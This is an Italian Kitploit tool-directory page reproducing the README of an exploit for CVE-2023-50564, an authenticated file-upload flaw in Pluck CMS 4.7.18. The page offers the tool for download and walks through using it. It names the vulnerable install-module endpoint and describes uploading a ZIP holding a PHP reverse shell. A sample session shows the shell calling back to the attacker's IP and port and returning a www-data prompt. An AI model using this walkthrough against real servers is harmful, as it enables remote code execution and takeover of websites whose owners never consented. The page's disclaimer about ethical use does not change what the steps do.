Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-50564 — Questo script sfrutta la funzionalità di upload dei file in Pluck CMS v4.7.18 per caricare un file PHP malevolo, consentendo l'accesso remoto tramite una reverse shell. Una volta caricata, questa backdoor garantisce all'attaccante l'accesso al server con i permessi del server web, consentendo ulteriori azioni all'interno del sistema o della rete. | Kitploit
Strumenti/GitHubGitHub/mrterrestrial/cve-2023-50564
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Vedi Repository
11 anno faNon ancora revisionato

Questo script sfrutta la funzionalità di upload dei file in Pluck CMS v4.7.18 per caricare un file PHP malevolo, consentendo l'accesso remoto tramite una reverse shell. Una volta caricata, questa backdoor garantisce all'attaccante l'accesso al server con i permessi del server web, consentendo ulteriori azioni all'interno del sistema o della rete.

Condividi

CVE-2023-50564 - Exploit per Pluck CMS v4.7.18

Panoramica

Questo script sfrutta una vulnerabilità autenticata di caricamento arbitrario di file in Pluck CMS v4.7.18 (CVE-2023-50564). Sfruttando questa vulnerabilità, un attaccante autenticato può caricare un file PHP malevolo, consentendo l'esecuzione di codice arbitrario (in questo caso, una reverse shell).

Dettagli dell'Exploit

  • CVE ID: CVE-2023-50564
  • Versione interessata: Pluck CMS v4.7.18
  • Tipo: Caricamento arbitrario di file autenticato
  • Impatto: Esecuzione remota di codice (RCE)

La vulnerabilità risiede nell'endpoint /admin.php?action=installmodule, che consente a un utente autenticato di caricare un file ZIP contenente file arbitrari. Caricando un file PHP malevolo, questo exploit stabilisce una reverse shell verso l'attaccante.

Requisiti

  • Python 3.x
  • Modulo requests: pip install requests
  • Modulo requests-toolbelt: pip install requests-toolbelt

Questo script richiede inoltre un login valido per l'istanza di Pluck CMS, inclusi l'URL e la password del target.

Funzionalità dell'Exploit

  • Reverse Shell: L'exploit carica una reverse shell PHP sul target e si ricollega alla macchina dell'attaccante.
  • Esecuzione interattiva dei comandi: Una volta stabilita la reverse shell, è possibile eseguire comandi interattivamente sul target.
  • Rilevamento delle richieste di password: L'exploit rileva le richieste di password (ad es., su, sudo -l) e consente all'utente di inserire manualmente l'input.

Utilizzo

Passaggi per eseguire l'exploit

  1. Clona il repository:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. Installa i pacchetti Python richiesti: Assicurati che i pacchetti richiesti siano installati:
root@kitploit:~
pip install requests requests-toolbelt
  1. Esegui l'exploit: Lo script richiede quattro input: l'URL del target, la password del CMS, il tuo indirizzo IP (per la reverse shell) e la porta su cui vuoi metterti in ascolto.

Esegui l'exploit usando Python:

root@kitploit:~
 python3 exploit.py
  1. Fornisci l'input quando richiesto:
  • Inserisci l'URL del target (ad es., example.com).
  • Inserisci la password per l'autenticazione sul CMS.
  • Inserisci il tuo indirizzo IP per la connessione della reverse shell.
  • Inserisci la porta per l'ascolto della reverse shell.
  1. Shell interattiva: Una volta stabilita la reverse shell, ti verrà mostrato un prompt Shell> per interagire con il sistema target.

Esempio:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

Analisi dell'Exploit

  • Autenticazione: Lo script accede al CMS utilizzando le credenziali fornite.
  • Caricamento file: Crea un archivio ZIP contenente una reverse shell PHP e lo carica sull'endpoint vulnerabile (/admin.php?action=installmodule).
  • Reverse Shell: Lo script attiva il file PHP caricato, stabilendo una connessione reverse shell verso la macchina dell'attaccante.

Dettagli CVE

  • CVE ID: CVE-2023-50564
  • Endpoint vulnerabile: /admin.php?action=installmodule
  • Versione vulnerabile: Pluck CMS v4.7.18
  • Tipo: Caricamento arbitrario di file autenticato

Dichiarazione di non responsabilità

Questo script è pensato per scopi educativi e hacking etico. Dovrebbe essere utilizzato solo in ambienti in cui si ha il permesso esplicito di testare. L'autore non è responsabile per qualsiasi uso improprio di questo strumento.

Licenza

Questo progetto è concesso in licenza sotto la MIT License - consulta MIT License per i dettagli.

Come contribuire

Sentiti libero di eseguire il fork del repository e inviare pull request. Per qualsiasi problema o richiesta di funzionalità, apri una issue su GitHub.

Scarica lo strumento